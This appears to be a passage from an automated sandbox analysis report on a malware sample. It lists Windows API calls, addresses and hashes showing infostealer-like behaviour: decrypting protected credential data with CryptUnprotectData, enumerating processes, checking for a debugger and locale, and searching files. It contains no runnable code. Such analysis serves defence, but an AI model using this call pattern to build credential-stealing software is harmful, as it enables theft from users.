                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                        • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                        • String ID: N@
                                                        • API String ID: 4291131564-4229412743
                                                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 02D07E48
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 02D07E60
                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 02D07E74
                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02D07EC9
                                                        • LocalFree.KERNEL32(00000000), ref: 02D07F89
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                        • String ID:
                                                        • API String ID: 3090951853-0
                                                        • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                        • Instruction ID: 13748a0c5c75dbfd115bfb724b16f51e76e495a564bcb938e0fffcf4473acc8a
                                                        • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                        • Instruction Fuzzy Hash: 27412871941228ABDB24DB94DCC8FEDB7B5FB44704F204199E109A62E0DB746F85CFA0
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                        • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 02D0BE09
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02D0BE1E
                                                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 02D0BE29
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 02D0BE45
                                                        • TerminateProcess.KERNEL32(00000000), ref: 02D0BE4C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction ID: fdaa568a76ff10f3463b51a9613663ce24c1c4e4b7dad3a0d9e5810355005a42
                                                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction Fuzzy Hash: 5F219EB89042059FDB14DF69F8C96963BE4FB0A314F50407AE90A872A4EBB05D81EF59
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                        • String ID:
                                                        • API String ID: 3657800372-0
                                                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02CF74B4
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02CF74BB
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02CF74E8
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 02CF750B
                                                        • LocalFree.KERNEL32(?), ref: 02CF7515
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                        • String ID:
                                                        • API String ID: 2609814428-0
                                                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction ID: 55285ca36535562671145f431c81b794bd5e44a595ec9dd78b29352bacf88940
                                                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction Fuzzy Hash: 2E010075A80208BBEB10DFD4DD45F9D77B9EB44704F104155F705AA2C0D670AA00CB65
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                        • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                        • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D09885
                                                        • Process32First.KERNEL32(00420ACA,00000128), ref: 02D09899
                                                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 02D098AE
                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 02D098C3
                                                        • CloseHandle.KERNEL32(00420ACA), ref: 02D098E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction ID: 1aee62d518867b90e2c9728ec0010321285d8e481b084326dbdb10d56b152056
                                                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction Fuzzy Hash: 10010C79A51208FFDB24DFE4CD94BEDB7F9EB49700F004189A505A6390D7749A40CF51
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 02CFE709
                                                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 02CFE759
                                                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 02CFE76F
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02CFEE46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 433455689-0
                                                        • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                        • Instruction ID: 896fd2555a67dacd187fd81b6e8b4cc2ec28e72925f1e5357a90765068e57eb2
                                                        • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                        • Instruction Fuzzy Hash: D512D772A143189BCB18FB61DD95FED737AEF54304F4041ADA60A562E0EE346F88CE61
                                                        APIs
                                                        • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptString
                                                        • String ID:
                                                        • API String ID: 80407269-0
                                                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                        APIs
                                                        • CryptBinaryToStringA.CRYPT32(00000000,02CF53EB,40000001,00000000,00000000,?,02CF53EB), ref: 02D09127
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptString
                                                        • String ID:
                                                        • API String ID: 80407269-0
                                                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction ID: 58f779d5826b2506eebc1d589fbf09b6b86170cbd7badd19296ce5c7754ac7ca
                                                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction Fuzzy Hash: 9611DA74204204BFDB00CFA4D899FA633AAAF89B54F009558F9198B3A1D7B5EC42DB61
                                                        APIs
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02CF5155,00000000,00000000), ref: 02CF9D56
                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,02CF5155,00000000,?), ref: 02CF9D68
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02CF5155,00000000,00000000), ref: 02CF9D91
                                                        • LocalFree.KERNEL32(?,?,?,?,02CF5155,00000000,?), ref: 02CF9DA6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                        • String ID:
                                                        • API String ID: 4291131564-0
                                                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction ID: 9b1f2263f2d40cae857b410caeacc135cab88c00c293f0658f7302c570273dd2
                                                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction Fuzzy Hash: BB11A774240208BFEB50CF94CC95FAA77B5EB89704F208058FE159B390C776A901CB90
                                                        APIs
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                        • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                        • LocalFree.KERNEL32(?), ref: 00409BD3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                        • String ID:
                                                        • API String ID: 3243516280-0
                                                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                        APIs
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02CF9DEB
                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 02CF9E0A
                                                        • memcpy.MSVCRT(?,?,?), ref: 02CF9E2D
                                                        • LocalFree.KERNEL32(?), ref: 02CF9E3A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                        • String ID:
                                                        • API String ID: 3243516280-0
                                                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction ID: 19adfa48781ff467500567c6ce33be703ffb0661a6e82ff011f76ec9e6354b62
                                                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction Fuzzy Hash: 0B11FAB8A00209EFDB04CFA4D985EAE77B5FF89304F104558E91597350D730AA10CF61
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02EB9D40,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02EB9D40,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02EB9D40,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                        • wsprintfA.USER32 ref: 00417AB7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                        • String ID:
                                                        • API String ID: 362916592-0
                                                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                        APIs
                                                        • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID:
                                                        • API String ID: 123533781-0
                                                        • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                        • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                        • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                        • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$GetProcAddress.$l
                                                        • API String ID: 0-2784972518
                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction ID: b4964778d27dd5c9aea483cc72df7d8fe5fb0e80ad3e6696e126dd7367174339
                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction Fuzzy Hash: 333168B6900609CFEB50CF99C880AAEBBF9FF48724F24404AD941A7215D771EA45CBA4
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                        • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                                        • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                        • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 02D0D156
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
